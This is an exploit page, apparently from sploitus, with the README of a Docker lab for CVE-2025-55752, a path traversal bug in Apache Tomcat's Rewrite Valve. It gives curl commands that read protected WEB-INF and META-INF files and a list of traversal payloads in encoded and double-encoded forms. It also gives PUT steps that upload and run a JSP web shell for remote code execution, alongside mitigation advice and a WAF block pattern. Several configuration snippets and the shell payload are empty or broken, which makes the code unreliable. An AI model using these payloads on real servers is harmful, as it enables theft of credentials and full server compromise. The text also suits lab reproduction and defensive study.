Share
## https://sploitus.com/exploit?id=15D49EBD-32BD-5AB7-9ADD-BCAC1D1A029B
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability

A comprehensive Docker-based reproduction environment for **CVE-2025-55752**, a critical path traversal vulnerability affecting Apache Tomcat.

## Overview

CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat caused by a regression in the fix for bug 60013. The vulnerability allows attackers to bypass security constraints protecting sensitive directories like `/WEB-INF/` and `/META-INF/` through careful URI manipulation when Rewrite rules are enabled.

### Vulnerability Characteristics

- **CVE ID**: CVE-2025-55752
- **CVSS v3.1 Score**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Affected Component**: Apache Tomcat Rewrite Valve
- **Discovery Date**: October 27, 2025
- **Discoverer**: Chumy Tsai, CyCraft Technology

## Affected Versions

| Tomcat Series | Affected Versions | Patched Version |
|---------------|------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | (EOL - No patched version) |

## Technical Details

### Root Cause

The vulnerability stems from a regression in the fix for bug 60013, where URL normalization occurs **before** URL decoding. This processing order allows attackers to craft specially formatted URIs that bypass security constraints:

```
Normal Flow: Decode โ†’ Normalize โ†’ Security Check
Vulnerable Flow: Normalize โ†’ Decode โ†’ Security Check (WRONG)
```

When a Rewrite Valve processes URI parameters, the attacker can:
1. Craft a URI with path traversal sequences
2. The normalization step removes the traversal syntax
3. The decoding step interprets it as normal path components
4. Security checks fail to detect the traversal

### Attack Requirements

The vulnerability requires **at least one** of the following conditions:

1. **Rewrite Valve enabled** with URI manipulation rules
   ```xml
   
   ```

2. **Path traversal patterns** in rewrite rules
   ```
   RewriteRule ^/api/(.*)$ /handler.jsp?path=$1 [L]
   ```

3. **(Optional) PUT method enabled** for increased severity
   ```xml
   
     readonly
     false
   
   ```

### Exploitation Scenarios

#### Scenario 1: Information Disclosure
Access sensitive configuration files:
```bash
curl http://target:8080/api/../WEB-INF/web.xml
curl http://target:8080/api/..%2fMETA-INF%2fMANIFEST.MF
```

**Result**: Configuration files exposed containing:
- Database credentials
- API keys and secrets
- Authentication mechanisms
- Class paths and application structure

#### Scenario 2: Remote Code Execution (with PUT enabled)
```bash
# Upload malicious JSP
curl -X PUT \
  -d '' \
  http://target:8080/api/../WEB-INF/shell.jsp

# Execute uploaded JSP
curl http://target:8080/WEB-INF/shell.jsp
```

**Result**: Full system compromise through arbitrary command execution

## Quick Start

### Prerequisites

- Docker and Docker Compose
- curl or similar HTTP client
- Python 3.7+ (for exploitation scripts)

### Running the Vulnerable Environment

```bash
# Clone repository
git clone https://ghe.misosiru.io/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752

# Start vulnerable Tomcat
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# View logs
docker-compose logs -f vulnerable-tomcat
```

### Testing the Vulnerability

#### Method 1: Using Provided Shell Script

```bash
# Run comprehensive test suite
bash docker/scripts/test_vulnerability.sh http://localhost:8080

# Results are saved in ./results directory
ls -la results/
```

#### Method 2: Using Python Exploit Script

```bash
# Install requirements
pip install requests urllib3

# Run exploit
python3 docker/scripts/exploit.py --url http://localhost:8080

# Save results to JSON
python3 docker/scripts/exploit.py --url http://localhost:8080 --output results.json
```

#### Method 3: Manual Testing with curl

```bash
# Test basic path traversal
curl -v http://localhost:8080/api/../WEB-INF/web.xml

# Test URL-encoded traversal
curl -v http://localhost:8080/api/..%2fWEB-INF%2fweb.xml

# Test with PUT method
curl -X PUT \
  -d "malicious content" \
  http://localhost:8080/api/../WEB-INF/test.jsp
```

## Payload Examples

### Path Traversal Variations

```
Basic traversal:
  /api/../WEB-INF/web.xml

URL-encoded:
  /api/..%2fWEB-INF%2fweb.xml

Double-encoded:
  /api/%252e%252e%252fWEB-INF%252fweb.xml

Multiple traversals:
  /api/../../WEB-INF/web.xml

Alternative separators:
  /api/..;/WEB-INF/web.xml
  /api/..%3fWEB-INF%3fweb.xml

Case manipulation:
  /api/..%2FWEB-INF%2Fweb.xml

Null byte injection:
  /api/..%00/WEB-INF/web.xml
```

### RCE Payload (when PUT is enabled)

```java


");
        }
    }
%>
```

## Environment Structure

```
CVE-2025-55752/
โ”œโ”€โ”€ docker/
โ”‚   โ”œโ”€โ”€ Dockerfile                          # Vulnerable Tomcat 10.1.44
โ”‚   โ”œโ”€โ”€ tomcat/
โ”‚   โ”‚   โ”œโ”€โ”€ conf/
โ”‚   โ”‚   โ”‚   โ”œโ”€โ”€ context.xml                # Rewrite Valve configuration
โ”‚   โ”‚   โ”‚   โ””โ”€โ”€ rewrite.config            # URL rewrite rules
โ”‚   โ”‚   โ”œโ”€โ”€ webapps/
โ”‚   โ”‚   โ”‚   โ””โ”€โ”€ ROOT/
โ”‚   โ”‚   โ”‚       โ”œโ”€โ”€ index.jsp              # Landing page
โ”‚   โ”‚   โ”‚       โ”œโ”€โ”€ handler.jsp            # Request analysis page
โ”‚   โ”‚   โ”‚       โ””โ”€โ”€ WEB-INF/web.xml       # Protected configuration
โ”‚   โ”‚   โ””โ”€โ”€ logs/                          # Tomcat logs
โ”‚   โ””โ”€โ”€ scripts/
โ”‚       โ”œโ”€โ”€ test_vulnerability.sh          # Bash test suite
โ”‚       โ””โ”€โ”€ exploit.py                     # Python exploitation toolkit
โ”œโ”€โ”€ docker-compose.yml                     # Docker Compose configuration
โ””โ”€โ”€ README.md                              # This file
```

## Understanding the Vulnerability

### Configuration Files Explained

#### context.xml
Enables the Rewrite Valve which is necessary to trigger the vulnerability:
```xml

  

```

#### rewrite.config
Defines rewrite rules that process URI parameters:
```
RewriteRule ^/api/(.*)$ /handler.jsp?path=$1 [L]
```

This rule captures everything after `/api/` and passes it as a `path` parameter.

#### web.xml
- Enables PUT method (`readonly=false`)
- Defines security constraints for WEB-INF
- Configures JSP handling

### Why It's Vulnerable

1. **URL comes in**: `/api/../WEB-INF/web.xml`
2. **Rewrite rule matches**: Captures `../WEB-INF/web.xml`
3. **URL is normalized** (BEFORE decoding in vulnerable version)
   - Normalization tries to remove `..` sequences
   - But URL encoding interferes with this process
4. **URL is decoded**
   - If properly encoded, traversal sequences survive
5. **Security constraint check** (now too late)
   - Path appears safe after decoding

## Detection and Diagnosis

### Check if You're Vulnerable

```bash
# 1. Check Tomcat version
docker exec cve-2025-55752-tomcat cat $CATALINA_HOME/RELEASE-NOTES.txt | grep "version"

# 2. Check if Rewrite Valve is enabled
docker exec cve-2025-55752-tomcat grep -r "RewriteValve" conf/

# 3. Check for rewrite rules
docker exec cve-2025-55752-tomcat find conf/ -name "*.config" -o -name "*.xml"

# 4. Test path traversal
curl -I http://localhost:8080/api/../WEB-INF/web.xml
# If Status 200: VULNERABLE
# If Status 403/404: Potentially protected
```

### Log Analysis

```bash
# View Tomcat error logs
docker-compose logs vulnerable-tomcat

# Check for suspicious requests
docker exec cve-2025-55752-tomcat tail -f logs/localhost.log
```

## Mitigation Strategies

### Immediate Actions (Before Patching)

1. **Disable Rewrite Valve** if not essential
   ```xml
   
    -->
   ```

2. **Disable PUT method** if not needed
   ```xml
   
     readonly
     true  
   
   ```

3. **Implement Web Application Firewall (WAF) rules**
   ```
   Block requests containing: ../, ..%2f, %2e%2e
   ```

4. **Enable security constraints** on sensitive paths
   ```xml
   
     
       /WEB-INF/*
     
     
   
   ```

### Long-term Solution (Patching)

Upgrade to patched versions:
```bash
# For Tomcat 11.x
docker pull tomcat:11.0.11

# For Tomcat 10.1.x
docker pull tomcat:10.1.45

# For Tomcat 9.0.x
docker pull tomcat:9.0.109
```

## Testing Verification

### Expected Vulnerable Behavior

When the environment is properly configured:

1. **Normal JSP files are accessible** (Status 200)
   ```
   GET /index.jsp โ†’ 200 OK
   ```

2. **WEB-INF is normally protected** (Status 403)
   ```
   GET /WEB-INF/web.xml โ†’ 403 Forbidden
   ```

3. **BUT via path traversal it's accessible** (Status 200)
   ```
   GET /api/../WEB-INF/web.xml โ†’ 200 OK (VULNERABLE!)
   ```

4. **PUT method returns appropriate status** (201/204 or 405)
   ```
   PUT /api/test.jsp โ†’ 201 Created (if PUT enabled)
   ```

## File Descriptions

### JSP Pages

- **index.jsp**: Landing page with vulnerability overview and test endpoints
- **handler.jsp**: Displays request analysis including URI, parameters, and headers
- **WEB-INF/web.xml**: Protected configuration file (demonstrative content)

### Scripts

- **test_vulnerability.sh**: Bash script running 10 different path traversal tests
- **exploit.py**: Python framework for systematic vulnerability assessment

### Configuration Files

- **context.xml**: Tomcat context configuration enabling Rewrite Valve
- **rewrite.config**: URL rewrite rules for path parameter handling
- **web.xml**: Web application configuration with security settings

## References

### Official Security Advisories
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [Apache Tomcat Security Documentation](https://tomcat.apache.org/security.html)

### Related CVEs
- CVE-2025-24813 (Tomcat RCE)
- CVE-2024-50379 (Similar traversal in other versions)

### Technical Resources
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname to a Restricted Directory](https://cwe.mitre.org/data/definitions/22.html)

## Cleanup

```bash
# Stop and remove containers
docker-compose down

# Remove volumes
docker-compose down -v

# Remove images
docker rmi cve-2025-55752-vulnerable-tomcat:latest
docker rmi tomcat:10.1.44
```

## Educational Use

This environment is designed for:
- Security research and education
- Penetration testing training
- Vulnerability analysis and understanding
- Security awareness programs
- CTF (Capture The Flag) challenges

**This environment should ONLY be used in:**
- Isolated testing networks
- Authorized security training
- Educational institutions
- Legitimate penetration tests with authorization

## Security Notice

**WARNING**: This repository contains intentionally vulnerable code. Do not deploy this environment in production or on public networks. Ensure proper network isolation and access controls.

## License

This project is provided for educational purposes. Refer to the LICENSE file for details.

## Contributing

Found improvements or additional payloads? Contributions are welcome!

## Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users are responsible for ensuring they have proper authorization before testing any systems.

---

**Last Updated**: October 2025
**Status**: Reproduction Environment - Fully Functional